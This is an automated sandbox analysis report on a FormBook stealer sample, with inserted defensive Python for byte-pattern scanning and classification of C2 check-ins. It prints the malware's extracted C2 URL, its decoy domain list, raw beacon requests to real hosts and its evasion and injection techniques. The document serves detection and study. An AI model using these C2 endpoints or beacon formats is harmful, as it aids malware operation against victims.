Analysis Report Purchase_Order.exe

Overview

General Information

Sample Name: Purchase_Order.exe
Analysis ID: 433266
MD5: 4aa8159742becd97f9ecdda33798b065
SHA1: 775aee28c33102de8c4bdd45dd09821b717b8678
SHA256: 65c6621762bb1bb1589a4a58d4ab2d3fa7c02e581b217b86ed2ff51227d7565b
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.culturalinterface.net/uqf5/"], "decoy": ["paolograssino.com", "hammockcoastproperty.net", "blinbins.com", "financierapoorvenirsas.com", "mattruddle.com", "wighumanhair.com", "tvdajiang14.com", "theblackharvest.com", "tylerrucarean.com", "a-prime-india-demataccount.zone", "amboselisafarigallery.info", "toolbnbapp.com", "scientificindustrial.com", "trainup-wall.com", "pocosmo.com", "thebluepottingtable.com", "leavelogs.com", "verbalfreedom.com", "qa4i.com", "kiiikoo.com", "glossedbythebrat.com", "gorditasdemaiz.com", "healthystartswithin.com", "homeanddesignstudio.com", "skalewide.com", "bestdispatchtowitnesstoday.info", "cineconhisense.com", "mahibhardwaj.com", "imperatrizacam.com", "bezoekburen.com", "qbakan.com", "ansalapishagunrealestate.com", "crow94723.com", "kosova.one", "chhhju.com", "cominghomestead.com", "ingenious.care", "unclesamsoftware.com", "xn--cfe12fhb.com", "tradinglantern.com", "wwwthedrudgereport.com", "researchinnovations.net", "to-cs.com", "sandia.info", "tachibana-fukushima.com", "pzzfw.com", "flockuplabs.com", "stays.travel", "itertempora.net", "murrietayoga.com", "plus5tocrafting.com", "ovidrelprefilledsyringe.com", "prltoday.com", "l24consultants.net", "mexicobeachselfstorage.com", "bnvjufj.icu", "schulze.media", "thewinebarrel.info", "blesst.tech", "newtec.life", "acmarketinghacks.com", "elitevillaholidays.com", "pr-daily.com", "cgjanvier.com"]}
Multi AV Scanner detection for submitted file
Source: Purchase_Order.exe Virustotal: Detection: 20%
Source: Purchase_Order.exe ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Purchase_Order.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Purchase_Order.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\LQmcYtPAJD\src\obj\Debug\AsAnyMarshaler.pdb source: Purchase_Order.exe
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.321048424.000000000136F000.00000040.00000001.sdmp, systray.exe, 00000010.00000002.505423938.0000000004F40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
Source: Binary string: RegSvcs.pdb source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop esi 4_2_00415837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop ebx 4_2_00406A94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi 4_2_004162BB
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop esi 16_2_010D5837
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop ebx 16_2_010C6A95
Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 16_2_010D62BB
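The three "4x nop then pop reg" hits above are reported as function offsets only. The following added example (not part of the sandbox report or of the sample) shows how that signature maps to bytes: four 0x90 nop bytes immediately followed by a single-byte pop r32 (opcode 0x58 + register index), scanned over a constructed buffer rather than the sample's memory. Register names, the sample buffer and the 0x400000 base are assumptions for illustration.

```python
import re

# x86 single-byte pop r32 opcodes: 0x58 + register index, in the order
# eax, ecx, edx, ebx, esp, ebp, esi, edi (so 0x5b = pop ebx, 0x5e = pop esi, 0x5f = pop edi).
POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Exactly four nop bytes followed by one pop r32 byte.
NOP4_POP = re.compile(rb"\x90{4}(?P<pop>[\x58-\x5f])")

def find_nop_then_pop(buf, base=0):
    """Return (virtual_address, register) for every 'nop;nop;nop;nop;pop reg' run in buf.
    base is the load address of buf[0], so results can be compared with the
    report's 4_2_... / 16_2_... function offsets."""
    hits = []
    for m in NOP4_POP.finditer(buf):
        reg = POP_REGS[m.group("pop")[0] - 0x58]
        hits.append((base + m.start(), reg))
    return hits

# Constructed test buffer (assumption: not bytes taken from the sample). It mixes
# ordinary prologue code with the three register variants the report lists, plus
# a run of only three nops that must not match.
SAMPLE = (
    b"\x55\x8b\xec"                      # push ebp; mov ebp, esp
    + b"\x90\x90\x90\x90\x5e"            # 4x nop; pop esi
    + b"\x33\xc0"                        # xor eax, eax
    + b"\x90\x90\x90\x90\x5b"            # 4x nop; pop ebx
    + b"\x90\x90\x90\x5f"                # only 3 nops; pop edi (no hit)
    + b"\x90\x90\x90\x90\x5f"            # 4x nop; pop edi
    + b"\xc3"                            # ret
)

if __name__ == "__main__":
    for va, reg in find_nop_then_pop(SAMPLE, base=0x400000):
        print(f"{va:#010x} nop x4 then pop {reg}")
```

Nop padding before a pop also occurs in legitimately aligned compiler output, which is why the report rates this only as "likely shell or obfuscated code"; use the pattern to locate candidate functions for manual review, not as a verdict on its own.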

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.culturalinterface.net/uqf5/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1 | Host: www.prltoday.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT HTTP/1.1 | Host: www.gorditasdemaiz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT HTTP/1.1 | Host: www.mexicobeachselfstorage.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT HTTP/1.1 | Host: www.tylerrucarean.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT HTTP/1.1 | Host: www.cgjanvier.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT HTTP/1.1 | Host: www.flockuplabs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1 | Host: www.culturalinterface.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT HTTP/1.1 | Host: www.toolbnbapp.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT HTTP/1.1 | Host: www.trainup-wall.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1 | Host: www.paolograssino.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT HTTP/1.1 | Host: www.a-prime-india-demataccount.zone | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
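Every request above has the same shape: GET, no User-Agent, Connection: close, the short path from the extracted configuration (/uqf5/), and a query of one long base64-looking value plus one short tag, sent to the configured C2 and to decoy domains alike. The following added example (written for this page, not code from the sandbox or the sample) parses a handful of such requests, applies that structural check, and labels each Host against the extracted configuration. The request texts are re-typed from the report with headers restored to separate lines; the decoy list is a subset of the one extracted above, the fourth request is a constructed benign control, and the parameter-length thresholds are assumptions.

```python
import re
from urllib.parse import urlsplit

# Extracted configuration from the report (C2 list verbatim; decoy list trimmed
# to the domains used in the sample requests below).
FORMBOOK_CONFIG = {
    "C2 list": ["www.culturalinterface.net/uqf5/"],
    "decoy": ["paolograssino.com", "gorditasdemaiz.com", "prltoday.com",
              "tylerrucarean.com", "a-prime-india-demataccount.zone"],
}

# Constructed request texts: three check-ins re-typed from the report plus one
# ordinary browser-style request as a control that must not match.
REQUESTS = [
    "GET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1\r\nHost: www.prltoday.com\r\nConnection: close\r\n\r\n",
    "GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1\r\nHost: www.culturalinterface.net\r\nConnection: close\r\n\r\n",
    "GET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1\r\nHost: www.paolograssino.com\r\nConnection: close\r\n\r\n",
    "GET /index.html?q=1 HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]

# Long base64 alphabet run with optional padding; 40 is an assumed lower bound.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query pairs and lower-cased headers.
    The query is split by hand so '+' and '/' in the beacon value are kept as sent."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    query = []
    for pair in parts.query.split("&") if parts.query else []:
        key, _, value = pair.partition("=")
        query.append((key, value))
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": parts.path, "query": query, "headers": headers}

def looks_like_formbook_checkin(req):
    """Structural heuristic for the check-in seen above: GET, no User-Agent,
    Connection: close, a single short directory as path, and exactly two query
    parameters, one long base64-looking blob and one short tag."""
    if req["method"] != "GET" or "user-agent" in req["headers"]:
        return False
    if req["headers"].get("connection", "").lower() != "close":
        return False
    if not re.fullmatch(r"/[a-z0-9]{2,8}/", req["path"]):
        return False
    if len(req["query"]) != 2:
        return False
    values = [v for _, v in req["query"]]
    long_vals = [v for v in values if B64_RE.match(v)]
    short_vals = [v for v in values if len(v) <= 8]
    return len(long_vals) == 1 and len(short_vals) == 1

def classify_host(host, config):
    """Label a Host header as the configured C2, a configured decoy, or unknown."""
    bare = host.lower().removeprefix("www.")
    c2_hosts = {u.split("/", 1)[0].lower().removeprefix("www.") for u in config["C2 list"]}
    if bare in c2_hosts:
        return "c2"
    if bare in {d.lower() for d in config["decoy"]}:
        return "decoy"
    return "unknown"

def triage(raw_requests, config):
    """Return (host, verdict) for every request that matches the check-in shape."""
    hits = []
    for raw in raw_requests:
        req = parse_request(raw)
        if looks_like_formbook_checkin(req):
            host = req["headers"].get("host", "")
            hits.append((host, classify_host(host, config)))
    return hits

if __name__ == "__main__":
    for host, verdict in triage(REQUESTS, FORMBOOK_CONFIG):
        print(f"{host:40s} {verdict}")
```

The check is keyed on the shape of the request rather than on the parameter names, which vary between builds. It also shows why the Snort alerts above fire against five different destination IPs: the same check-in goes to decoys and the C2 alike, so the extracted configuration, not the traffic volume, identifies the host that matters for blocking and for takedown requests.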
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 213.186.33.5
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View ASN Name: OVHFR
Source: unknown DNS traffic detected: queries for: www.prltoday.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 11 Jun 2021 13:02:33 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html>
Source: Purchase_Order.exe, 00000000.00000003.241548215.00000000061F2000.00000004.00000001.sdmp String found in binary or memory: http://en.w
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmp String found in binary or memory: http://schemas.micr
Source: Purchase_Order.exe, 00000000.00000002.259634056.0000000002AD1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase_Order.exe, 00000000.00000003.245364083.00000000061EE000.00000004.00000001.sdmp String found in binary or memory: http://www.agfamonotype.
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.282669456.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: Purchase_Order.exe, 00000000.00000003.242455042.00000000061CD000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coma
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comen
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.commd
Source: Purchase_Order.exe, 00000000.00000002.269184385.00000000061CE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Purchase_Order.exe, 00000000.00000003.245036335.00000000061EE000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Purchase_Order.exe, 00000000.00000003.248726624.00000000061EE000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Purchase_Order.exe String found in binary or memory: http://www.google.com
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/=
Source: Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/N
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Q
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/X
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/b
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Q
Source: Purchase_Order.exe, 00000000.00000003.243047372.00000000061C3000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/oi
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/u
Source: Purchase_Order.exe, 00000000.00000003.250232182.00000000061ED000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.245076408.00000000061EE000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
